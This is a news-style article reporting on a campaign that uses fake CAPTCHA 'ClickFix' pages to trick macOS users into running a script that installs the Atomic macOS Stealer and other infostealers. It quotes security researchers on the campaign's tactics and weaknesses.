A new campaign has been reported distributing the Atomic macOS Stealer (AMOS) targeting Apple macOS systems. To launch its attacks, it employs a social engineering technique known as ClickFix. Malicious software created by other Russian-speaking cybercriminals fools users into accidentally downloading the AMOS variant. This should be enough to sound alarm bells of how keyless entry compromises security of the macOS devices.
AMOS, an information stealer malware, employs ClickFix to lure users into executing a shell script that requests their system password. As soon as it has been supplied, the script retrieves the next-stage payload that, in most known cases, has been AMOS. This campaign has been described as a supercharged delivery operation that uses many other sophisticated tactics to manipulate users.
“macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation.” The script uses native macOS commands to extract credentials, defeat security features, and run malicious binaries.
Beyond AMOS, the campaign delivers these other payloads through fake Turnstile pages, including Lumma and StealC. Interestingly, the NetSupport RAT is included in this sinister distribution machine. Other Russian language comments discovered within the malware’s source code add hints to its existence.
The ClickFix tactic takes advantage of users’ knowledge of common internet security warnings. As noted by cybersecurity experts at Darktrace, “ClickFix baiting is a widely used tactic in which threat actors exploit human error to bypass security defenses.” I really like how they stress that threat actors mostly use the same techniques to get that initial access.
The campaign’s approach is pretty clever, showing users an entirely phony CAPTCHA verification when they select the “I am human” tickbox. Users are then met with an error message stating “CAPTCHA verification failed,” which encourages them to click a button for “Alternative Verification.” This manipulation exploits the conditioned responses of modern internet users, as highlighted by cybersecurity expert Daniel Kelley: “Modern internet users are inundated with spam checks, CAPTCHAs, and security prompts on websites, and they’ve been conditioned to click through these as quickly as possible.”
Koushik Pal remarked on the delivery infrastructure’s flaws, stating, “Poorly implemented logic in the delivery sites, such as mismatched instructions across platforms, points to hastily assembled infrastructure.” The attackers furthermore display a smart tactic for spreading their malware. Their implementation is likely to reveal vulnerabilities that we can and do pounce upon to shore up our own defenses.
Cybersecurity specialists caution that these attacks can take shape in a multitude of ways. Darktrace points out that “these include spear phishing attacks, drive-by compromises, or exploiting trust in familiar online platforms.” This layered approach maximizes the chances of malicious infiltration into valuable systems.